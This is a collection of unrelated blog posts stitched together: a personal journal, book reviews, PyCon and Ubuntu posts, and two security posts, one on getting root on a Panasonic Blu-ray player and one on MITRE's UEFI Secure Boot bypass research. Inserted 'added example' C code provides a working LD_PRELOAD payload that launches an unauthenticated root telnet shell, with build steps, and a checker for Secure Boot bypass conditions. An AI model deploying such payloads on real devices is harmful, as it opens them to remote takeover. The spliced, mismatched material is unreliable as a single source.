Since Zond7 left Monday night I have suddenly degenerated from my smug routine, forget to eat meals, and there is laundry everywhere. Somehow instead of writing extra poetry and living in a nice neat environment I have entered odd workaholic and not-taking-care-of-myself mode.
I think it is also the tramadol and extra coffee. Must fix that tomorrow.
Tea only after 1 cup of coffee, and no tramadol after .. umm..... 1pm?
I wrote to the EFF as I said I would. Yesterday I did a fun zine reading thing at DU, I worked quite hard, went to all the meetings ever fucking invented, hacked some portals (which was super relaxing and fun), and grocery shopped.
I read from a funny old zine and a section from a newish poem that I think is nearly done.
Cannot do enough at work to feel like I'm on top of things or truly competent. How to limit things????? Why do I keep on taking more responsibility?
i do not want to burn out.
Also I went to 2 doctor appointments which, while not especially stressful or hard (and I went in a cab), were still stressful and hard.
I miss Zond7 quite a lot!
I think I need to strictly enforce some hours off even if I can't take a whole day ... which I don't feel that I can....
I doubt I'll ever so much as see the mountain, but nevertheless having appropriated it as a metaphor for my own decidedly non-life threatening and unrelated personal enterprise, I acknowledge and mourn the deaths of 16 men on April 18:
Mingma Nuru Sherpa
Ang Tshiri Sherpa
Phurba Ongyal Sherpa
Lakpa Tenjing Sherpa
Chhiring Ongchu Sherpa
Then Dorjee Sherpa
Phur Temba Sherpa
Pasang Karma Sherpa
Tenzing Chottar Sherpa
Pem Tenji Sherpa
Ash Bahadur Gurung
(Per Nepali report and Alan Arnette.)
Photo by Bernard Goldbach
More from synedochic and Jon Krakauer.
Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.
Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Running strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.
/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu-ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.
But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:
export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so
so then it was just a matter of building a library that hooked open() and launched inetd, dropping that into the right place, and then opening the browser.
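As an added example, not code from the post: a preload library in C of the kind the paragraph describes. Built and copied to /mnt/sda1/bbb/libSegFault.so on the USB stick, it gets loaded into the browser by that LD_PRELOAD line; on the browser's first open() it forks off a telnetd with a root shell and then hands the call to libc's open() so the browser keeps working. It launches telnetd -l /bin/sh (busybox syntax) rather than inetd; the path /usr/sbin/telnetd and the BDT_PAYLOAD environment override are assumptions for illustration, and a real build would use the toolchain for the player's CPU.

```c
/* Added example, not Garrett's code. Preload library: interposes open(),
 * launches a detached telnetd on the first call, then passes the call on.
 * Telnetd path/flags and the BDT_PAYLOAD override are assumptions. */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *)-1L)   /* glibc/musl value, for when the header hides it */
#endif

/* Assumed busybox telnetd on the player: -l runs this program on connect. */
static char *const default_payload[] = { "/usr/sbin/telnetd", "-l", "/bin/sh", NULL };

static int payload_started;                       /* set once per process */
static int (*real_open)(const char *, int, ...);  /* libc's open() */

/* Double-fork so the daemon is reparented to init and outlives the browser.
 * Returns 0 if the grandchild was created, -1 on fork/wait failure. Whether
 * execv() itself succeeded in the grandchild is not observable here. */
int spawn_detached(const char *path, char *const argv[])
{
    pid_t child = fork();
    if (child < 0)
        return -1;
    if (child == 0) {
        pid_t grandchild = fork();
        if (grandchild == 0) {
            setsid();                 /* detach from the browser's session */
            execv(path, argv);
            _exit(127);               /* exec failed: nothing to clean up */
        }
        _exit(grandchild < 0 ? 1 : 0);
    }
    int status = 0;
    while (waitpid(child, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;
    }
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

/* Launch the payload the first time this is called; later calls are no-ops.
 * Returns 1 when this call launched it, 0 otherwise. */
int run_payload_once(void)
{
    if (payload_started)
        return 0;
    payload_started = 1;
    const char *override = getenv("BDT_PAYLOAD");   /* hypothetical knob, used by the test */
    if (override) {
        char *const argv[] = { (char *)override, NULL };
        spawn_detached(override, argv);
    } else {
        spawn_detached(default_payload[0], default_payload);
    }
    return 1;
}

int payload_was_started(void)
{
    return payload_started;
}

/* The interposed open(): LD_PRELOAD puts this library ahead of libc, so every
 * open() the browser makes lands here first. */
int open(const char *path, int flags, ...)
{
    mode_t mode = 0;
    if (flags & O_CREAT) {            /* the mode argument only exists with O_CREAT */
        va_list ap;
        va_start(ap, flags);
        mode = (mode_t)va_arg(ap, int);
        va_end(ap);
    }
    if (!real_open)
        real_open = (int (*)(const char *, int, ...))dlsym(RTLD_NEXT, "open");
    if (!real_open) {
        errno = ENOSYS;
        return -1;
    }
    run_payload_once();
    return real_open(path, flags, mode);
}
```

Build with gcc -shared -fPIC -o libSegFault.so preload.c (add -ldl on older glibc). The double fork matters: a daemon left as a direct child of the browser dies, or turns into a zombie, along with the browser. The same loader behaviour is the defensive lesson here: a preload path on removable media hands code execution in that process to anyone who can write to the stick.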
This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.
The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.
So, while the first two books were concurrent with different characters, the third starts right after those and continues with both sets of characters surviving together in the decimated world. With one exception (the new information about the genetic spliced creatures), the current-time story (surviving) isn't very notable. Most of the book is actually about one character's history, Zeb, and about another character retelling it to the Crakers. The style is readable, though a bit put on toward the end when one of the Crakers is actually telling the story.
The book went by fast and I liked it well enough, but I wouldn't say it was mindblowing. It did redeem The Year of the Flood a fair bit.
This book generally follows three character viewpoints: Bazhell, the lead for all of the books and champion of the war god; Leanna, who was a teenager when we last saw her and is now an adult war maid; and the villain of the moment. Like previous books, the villain sections remain a bit of a slog - they're where I most often put the book down, because I obviously don't like the character. It's not my favourite form of exposition.
The relationship between Bazhell and Leanna (you may recall my cringing at it while she was younger) is still incredibly meh. At least it's not really drawn out, but I didn't believe them as a pairing and it reads a bit creepy the same way Sparhawk/Ehlana did (if you're unfamiliar: young girl puts designs on older warrior and eventually "traps" him into marriage as an adult). Not as bad, but... eh.
Overall, the series may have hit its peak already for me. There were too many characters with similar names to try to keep straight, the stakes are getting unreasonably high and the battles unpicturably large. It's pretty clear there's another book planned to follow, and I'll probably read it, but it's getting too high fantasy for me if this is any indication.
A couple weeks ago I was in Montreal for PyCon 2014. It was an amazing conference, but I was also glad to have some time to explore the beautiful city that is Montreal.
On Thursday (2nd day of tutorials) I didn’t have anything scheduled conference-wise, so I met up with my friend and long time Ubuntu contributor John Chiazzese (IdleOne). We’ve worked together online on Ubuntu for several years, and even both lived in the same area at the same time at one point, but we never managed to meet. My love of zoos landed us at the Montreal Biodome, housed in a former Olympic building.
The Biodome takes you through 4 different environments where they have mini-ecosystems for each and animals that populate the zones. The lynx were a big draw for me:
The river otter was also quite adorable and looking for attention. I also quite enjoyed the monkeys! And the penguins!
One of the evenings after the conference I joined a few of my colleagues to see the And Then There Was Light sound and light show at the Notre Dame Basilica, not far from the convention center.
As a fan of historical religious buildings, I was eager for my chance to walk around the basilica as a tourist. The “sound and light show” portion of the show was a bit cheesy, giving folks a history of the French colonists and the basilica itself, but we had fun. Afterwards, we had 15 minutes to walk around and take photos, hooray!
Once they had pulled up the curtains used during the show, the interior did not disappoint. The altar in particular was spectacular:
I was also exposed to a lot of great food in Montreal, only a fraction of which I could eat. I had unfortunately fallen ill just before my trip and was on a strict bland diet – no red meat, no alcohol, no fatty foods. In a city full of steakhouses, wine and cheese this was a special kind of torture, but it did allow me to explore the menus beyond what I might typically order (and I did cheat a bit with the cheese). I ate a lot of chicken, fish and vegetables.
I was fortunate to have decent walking weather during most of the trip, but as the event wound down I found the chilly weather coming back; I even heard that there were some flurries the day after I left. Montreal is great, but it was nice to be on my way back to California when the snow returned!
More photos from my tourist adventures in Montreal here: https://www.flickr.com/photos/pleia2/set
Read The Goblin Emperor, which I highly recommend! OMG... more like this!
Also, Pen Pal by Francesca Forrest.
Tomorrow the next Ubuntu Long Term Support (LTS) release comes out, 14.04, development code name Trusty Tahr. In preparation, I was putting together some materials for our release event next week and found myself looking for the Tahr artwork when I remembered that it was included in the installer. So now I’ll share it with you as well!
I haven’t found an svg version of this logo, but I’ll be sure to update this post if I do.
Thanks to Tom Macfarlane of Canonical for emailing me a copy of the svg version! You can get a copy here.
Looking for something slightly different? The Xubuntu team also included a tahr in our installer, created by Simon Steinbeiß:
This png has transparency, which makes it show grey on white, but you can flavor it with any color you wish!
Enjoy! And happy release everyone!
So having gone to sleep on a mythological bent, I ended up with a fair bit of Patricia Wrede's short story about the frying pan of doom bouncing about the dream landscape, which was still the Giant's Causeway (but clearly where it borders the Enchanted Forest).
And then when I woke up my radio alarm was playing the song Call Me Maybe, which I ended up hearing/dreaming as the Daleks version of the song as I went back into snooze land.
(I just met you, and this is a crazy! I'm a Dalek, ex-ter-mi-nate!)
- - -
Dreaming about Patricia Wrede's story made me somewhat crave after battle triple chocolate helmet cake, even if mostly I was interviewing kitchen maids who kept being hidden princesses in disguise, but it turned out one of them could really cook so it was ok.
- - -
So one of the tours of the Giant's Causeway is actually the Game of Thrones tour of Northern Ireland. (There is a 1 day option, which is all I'd have time for). I am embarrassed by how tempting that is, and trying to justify it to myself as the "interesting historical scenery with an added geeky bonus" tour.
The MITRE paper describes a couple of attacks. The first is that some platforms store their Secure Boot policy in a run-time UEFI variable. UEFI variables are split into two broad categories - boot time and run time. Boot time variables can only be accessed while in boot services - the moment the bootloader or kernel calls ExitBootServices(), they're inaccessible. Some vendors chose to leave the variable containing firmware settings available during run time, presumably because it makes it easier to implement tools for modifying firmware settings at the OS level. Unfortunately, some vendors left bits of Secure Boot policy in this space. The naive approach would be to simply disable Secure Boot entirely, but that means that the OS would be able to detect that the system wasn't in a secure state [1]. A more subtle approach is to modify the policy, such that the firmware chooses not to verify the signatures on files stored on fixed media. Drop in a new bootloader and victory is ensured.
But that's not a beautiful approach. It depends on the firmware vendor having made that mistake. What if you could just rewrite arbitrary variables, even if they're only supposed to be accessible in boot services? Variables are all stored in flash, connected to the chipset's SPI controller. Allowing arbitrary access to that from the OS would make it straightforward to modify the variables, even if they're boot time-only. So, thankfully, the SPI controller has some control mechanisms. The first is that any attempt to enable the write-access bit will cause a System Management Interrupt, at which point the CPU should trap into System Management Mode and (if the write attempt isn't authorised) flip it back. The second is to disable access from the OS entirely - all writes have to take place in System Management Mode.
The MITRE results show that around 0.03% of modern machines enable the second option. That's unfortunate, but the first option should still be sufficient [2]. Except the first option relies on the SMI actually firing. And, conveniently, Intel's chipsets have a bit that allows you to disable all SMI sources [3], and another bit that locks the first one against further writes. Except 40% of the machines MITRE tested didn't bother setting that lock bit. So you can just disable SMI generation, remove the write-protect bit on the SPI controller and then write to arbitrary variables, including the SecureBoot enable one.
This is, uh, obviously a problem. The good news is that this has been communicated to firmware and system vendors and it should be fixed in the future. The bad news is that a significant proportion of existing systems can probably have their Secure Boot implementation circumvented. This is pretty unsurprising - I suggested that the first few generations would be broken back in 2012. Security tends to be an iterative process, and changing a branch of the industry that's historically not had to care into one that forms the root of platform trust is a difficult process. As the MITRE paper says, UEFI Secure Boot will be a genuine improvement in security. It's just going to take us a little while to get to the point where the more obvious flaws have been worked out.
[1] Unless the malware was intelligent enough to hook GetVariable, detect a request for SecureBoot and then give a fake answer, but who would do that?
[2] Impressively, basically everyone enables that.
[3] Great for dealing with bugs caused by YOUR ENTIRE COMPUTER BEING INTERRUPTED BY ARBITRARY VENDOR CODE, except unfortunately it also probably disables chunks of thermal management and stops various other things from working as well.
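As an added example, not code from the post or from the MITRE paper: the decision logic behind the two attacks above, in C, run over constructed inputs rather than values read from real hardware. The bit definitions are the public ones - UEFI variable attributes from the UEFI spec, and BIOS_CNTL (LPC bridge PCI config offset 0xDC), GEN_PMCON_1 (offset 0xA0) and SMI_EN (PMBASE + 0x30) from Intel's datasheets for the PCHs of that era. The sample efivarfs file contents and register values are constructed for illustration; which variable actually holds a platform's policy is something you still have to find out per vendor.

```c
/* Added example, not from the post. Decides, from UEFI variable attributes
 * and three PCH registers, whether the two MITRE attacks apply. All inputs
 * below are constructed; nothing here reads real hardware. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* UEFI variable attribute bits (UEFI spec). */
#define EFI_VARIABLE_NON_VOLATILE        0x1u
#define EFI_VARIABLE_BOOTSERVICE_ACCESS  0x2u
#define EFI_VARIABLE_RUNTIME_ACCESS      0x4u

/* Linux efivarfs exposes each variable as a file: 4 bytes of little-endian
 * attributes followed by the data. Returns 0 and fills *attrs, or -1 if the
 * file is too short to carry the header. */
int efivar_attributes(const uint8_t *file, size_t len, uint32_t *attrs)
{
    if (len < 4)
        return -1;
    *attrs = (uint32_t)file[0] | ((uint32_t)file[1] << 8) |
             ((uint32_t)file[2] << 16) | ((uint32_t)file[3] << 24);
    return 0;
}

/* Attack one needs policy in a variable that survives ExitBootServices():
 * non-volatile and runtime-accessible. A volatile runtime variable (like the
 * SecureBoot indicator itself) cannot be set from the OS, so it doesn't count. */
int efivar_settable_at_runtime(uint32_t attrs)
{
    return (attrs & EFI_VARIABLE_RUNTIME_ACCESS) &&
           (attrs & EFI_VARIABLE_NON_VOLATILE);
}

/* BIOS_CNTL bits. */
#define BIOS_CNTL_BIOSWE   (1u << 0)   /* BIOS Write Enable */
#define BIOS_CNTL_BLE      (1u << 1)   /* setting BIOSWE raises an SMI */
#define BIOS_CNTL_SMM_BWP  (1u << 5)   /* flash writes only while in SMM */
/* GEN_PMCON_1: once set, GBL_SMI_EN can no longer be changed. */
#define GEN_PMCON_1_SMI_LOCK (1u << 4)
/* SMI_EN: master enable for SMI generation. */
#define SMI_EN_GBL_SMI_EN  (1u << 0)

enum flash_state {
    FLASH_WRITABLE_FROM_OS,  /* no BLE: set BIOSWE and write */
    FLASH_BLE_SMI_OFF,       /* BLE set but SMIs already globally off: BIOSWE sticks */
    FLASH_BLE_UNLOCKED_SMI,  /* BLE set, SMI_LOCK clear: clear GBL_SMI_EN, set BIOSWE (the 40% case) */
    FLASH_BLE_LOCKED,        /* BLE set, SMI_LOCK set: the SMM handler reverts BIOSWE */
    FLASH_SMM_ONLY           /* SMM_BWP set: OS writes fail whatever BIOSWE says (the 0.03% case) */
};

enum flash_state classify_flash(uint8_t bios_cntl, uint16_t gen_pmcon_1, uint32_t smi_en)
{
    if (bios_cntl & BIOS_CNTL_SMM_BWP)
        return FLASH_SMM_ONLY;
    if (!(bios_cntl & BIOS_CNTL_BLE))
        return FLASH_WRITABLE_FROM_OS;
    if (!(smi_en & SMI_EN_GBL_SMI_EN))
        return FLASH_BLE_SMI_OFF;
    if (!(gen_pmcon_1 & GEN_PMCON_1_SMI_LOCK))
        return FLASH_BLE_UNLOCKED_SMI;
    return FLASH_BLE_LOCKED;
}

/* 1 if either route is open: the policy variable (attack one) or the flash
 * holding every variable (attack two) can be rewritten from the OS. */
int secure_boot_bypassable(uint32_t policy_var_attrs, enum flash_state flash)
{
    return efivar_settable_at_runtime(policy_var_attrs) ||
           flash == FLASH_WRITABLE_FROM_OS ||
           flash == FLASH_BLE_SMI_OFF ||
           flash == FLASH_BLE_UNLOCKED_SMI;
}

int main(void)
{
    /* Constructed efivarfs contents: an NV|BS|RT "setup"-style variable and a
     * volatile BS|RT one like SecureBoot, each followed by one data byte. */
    const uint8_t setup_file[] = { 0x07, 0x00, 0x00, 0x00, 0x01 };
    const uint8_t sb_file[]    = { 0x06, 0x00, 0x00, 0x00, 0x01 };
    uint32_t a;
    if (efivar_attributes(setup_file, sizeof setup_file, &a) == 0)
        printf("setup-style variable settable at runtime: %d\n", efivar_settable_at_runtime(a));
    if (efivar_attributes(sb_file, sizeof sb_file, &a) == 0)
        printf("SecureBoot-style variable settable at runtime: %d\n", efivar_settable_at_runtime(a));
    /* BLE on, SMI_LOCK clear, SMIs enabled: the common misconfiguration. */
    printf("bypassable via flash: %d\n",
           secure_boot_bypassable(0x6, classify_flash(0x02, 0x0000, 0x1)));
    return 0;
}
```

On a real machine the register reads are what chipsec's common.bios_wp and common.bios_smi modules do; this block only covers the decision once you have the values. Note the ordering in classify_flash: SMM_BWP wins regardless of the SMI bits, and a platform that ships with GBL_SMI_EN already clear is just as exposed as one that forgot SMI_LOCK.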
As I mentioned in my post about the PiDoorbell workshop, this past week I attended my first PyCon in beautiful (if chilly) Montreal, QC. I did some touristing, but I’ll write about that once I have all my photos up…
But now, the conference!
It was the first conference I’ve attended where I volunteered to help out with the HP booth. I was worried that my role as an engineer on the OpenStack project would leave me completely unprepared to answer questions about HP specifically, but I was instead greeted with kinship among most folks who I spoke with as they could appreciate HP’s investment in open source (and Python). I was also pleased to learn that the guys from the local HP office who came to help out with the booth were also all engineers, focused on either network or printing. Having the actual engineers who helped design the hardware we had on display at the booth was really cool.
Plus, I’m sure it helped that we have a bunch of open Python, OpenStack and other cloud jobs, so plenty of folks were eager to hear about those.
I wasn’t at the booth all weekend; I attended all the keynotes and several talks throughout the event. I think my favorite talks ended up being Track memory leaks in Python by Victor Stinner, Subprocess to FFI: Memory, Performance, and Why You Shouldn’t Shell Out by Christine Spang and In Depth PDB by Nathan Yergler. Upon reflection this makes sense given my work in ops: I’m much more likely to be debugging Python code in my typical day than writing something, so the talks about tracking down problems and performance issues are right up my alley.
The keynotes all three days were great. On Sunday I was particularly struck by the conference gender diversity. In addition to having a reported 1/3 female speakers and attendees, all the leadership in the Python community seem genuinely dedicated to the issue. I’m so used to projects that are still arguing over whether a problem exists let alone taking solid, unapologetic steps to correct the cultural bias. So thank you Python community, for giving us an opportunity to catch up, it’s working!
And finally, since I can’t go anywhere anymore without getting pulled into an OpenStack event, I finally met Dana Bauer from Rackspace this week and she invited me to come help out with a short OpenStack workshop for women on Sunday morning from 10 until noon. The lab they had set up didn’t quite work out, but it gave attendees the opportunity to go in the direction they wanted to. I was able to help a bit here and there, and James E. Blair gave a mini-presentation to a few folks on how to get going with DevStack.
At lunch I was able to meet up with Tatiana Al-Chueyr to chat some about the contribution workflow for OpenStack, which is always a lot of fun for me.
I’m pretty much exhausted from all the socializing, but as always with these conferences it was great to meet up with and chat with friends I haven’t seen in a long time. Thanks to everyone for such a fun week!
Tonight the weather started to turn chilly again, time to head home.
The release of Ubuntu 14.04 (Trusty Tahr) LTS is coming up on Thursday, April 17th!
To celebrate, the Ubuntu California team in San Francisco will be hosting an Ubuntu release party at AdRoll! Huge thanks to them for offering us space for this event.
AdRoll is located at 972 Mission Street in San Francisco. It’s within easy walking distance of the Powell Street BART and MUNI stations, which we recommend since parking can be expensive downtown.
Our party will be very casual with free pizza and drinks for attendees. But we do have planned…
- Mini presentation highlighting Ubuntu 14.04 features
- Laptops running various flavors of 14.04
- Tablets and phones running the latest Ubuntu build
- Ubuntu quiz, with prizes!
So if you’re in the area and would like to join us, please RSVP here:
Alternatively you can email me directly at firstname.lastname@example.org and I’ll get you added to the attendee list.
San Francisco isn’t the only active part of the state this release; San Diego is also hosting an event on April 17th, details here. If you’re near Los Angeles, Nathan Haines is collaborating with the Orange County Linux Users Group (OCLUG) to do an installfest on Saturday May 24th, learn more here.
Not in California? Events are coming together all around the world, check out the LoCo Team Portal to see if there is an event being planned in your area: 14.04 Release Parties.
This week I had the opportunity to attend PyCon for the first time. Since beginning to use Python in my systems work so much last year, I’ve had increasing interest in participating in this conference in some capacity, so when the opportunity came around at work to staff the HP booth here in Montreal I was happy to volunteer.
I was also brought to PyCon to be a Teaching Assistant for the Build your own PiDoorbell! – Learn Home Automation with Python tutorial with fellow CodeChix members Rupa Dachere, Akkana Peck, Deepa Karnad Dhurka, Serpil Bayraktar and Stuart Easson.
We spent several weeks preparing for this tutorial. I made the trek down to Palo Alto twice to attend mini-sprints so we could test out the instructions in person prior to the event. We were able to add a number of improvements to both the code and documentation through these events and worked out some of the logistical issues of doing such a hardware event at a conference venue.
The actual tutorial was held on Wednesday afternoon. Attendees quickly piled in and we were able to distribute our kits. Somehow we ended up with a few too many registrants but were able to scramble together a few extra pieces to make it work for everyone.
The tutorial was split into several sections, with the tutorial leads (Rupa and Akkana) giving presentations and us TAs going around and helping everyone with their setups when they got stuck. The biggest challenge for most was getting their system to talk to the Raspberry Pi, as we had folks on various operating systems with all kinds of network and USB setups.
Once we got everyone talking to the Pis, it was time for the fun stuff! Akkana gave a great presentation that was a tour of the hardware of the Raspberry Pi, including the setup of the GPIO pins configuration. For more about some cool hardware stuff she’s been doing with the Pi, I highly recommend her blog posts on the topic.
Then we had an led.py script to allow folks to make an LED blink:
As you can see, we’re using solderless breadboards so we didn’t have the complexity of soldering, thank goodness.
Then came the meat of the tutorial, wiring up the distance sensor (and camera if they had one) to actually detect when objects passed and take a photo. I brought along both my Raspberry Pi NoIR Camera Board – Infrared-sensitive Camera and my webcam from my desk at home so attendees could play around with them if they didn’t have ones of their own.
Surprisingly for a hardware tutorial with such a diversity of host systems, I’m happy to report that most of the students were able to get the tutorial fully completed – at least to the point of taking pictures, if not the upload and notification portion. It was a lot of work for us TAs as we ran around helping everyone and debugging serial and networking issues, but it was worth it to see how much fun everyone had when they finally got an LED to blink or took their first picture.
All of the slides and source code are freely licensed, but the repository hasn’t been made available yet as Rupa wanted to fix some important bugs first (can’t have people frying their Pis!). But never fear, I’ll be following up to make sure it’s made available as soon as possible so others can do this too!
I’ve uploaded more photos from the event here: https://www.flickr.com/photos/pleia2/set
I’ve had a very busy year so far talk-wise. Back in January I gave a handful of sysadmin focused talks at Linux.conf.au in Perth, Western Australia. In February I did similar at the Southern California Linux Expo. In May I’ll be drifting slightly away from a Linux-only crowd to present at LOPSA-East in New Brunswick, New Jersey on May 3rd.
First up on the schedule I’ll be doing my Code Review for Sys Admins talk:
I’m a member of the OpenStack Infrastructure team which is a geographically distributed team of systems administrators from several different companies who work together in public to maintain the infrastructure described at http://ci.openstack.org.
To achieve this, we use a code review system that leverages Gerrit as the interface for peer review and Jenkins to run some basic configuration and code syntax checking against our submissions. This allows us to maintain code and config file integrity and gives us a nice platform so that our fellow systems administrators can comment on and improve solutions we come up with. We also use IRC, Etherpad and more for collaboration, which I will discuss.
I love giving this talk and I’m excited to be giving it at a conference focused at sysadmin-type folks in the industry.
But it gets better, they’ve also asked me to keynote on Saturday evening!
I’ve titled my talk Universal Design for Tech: Improving Gender Diversity in our Industry (thanks to Leigh Honeywell for the title idea):
Universal Design is a principle in accessibility: accessible design makes things better for everyone. Key examples are curb cuts and door openers, which help those who are disabled but also folks with luggage and parents with strollers.
Elizabeth will discuss ideas on how to improve gender diversity in our industry, but many of the tips will help everyone beyond improvements that come through diversity. From offering formal education for systems administration to offering flexible schedules and work arrangements, there are many things that can be done to attract much-needed talent.
As someone who has made it in the industry I’m keen on preserving the environment that I’ve grown and thrived in, but also in making small changes that I know would have helped me along the way and will help others, including women.
I also took some time to chat with Tom Limoncelli about my talk, which he’s posted on the Everything Sysadmin blog: Interview with LOPSA-East Keynote: Elizabeth Krumbach Joseph
Registration is still open for the conference and I hear there might even be some space at the hotel left (but it’s filling up fast!). Hope to see you there!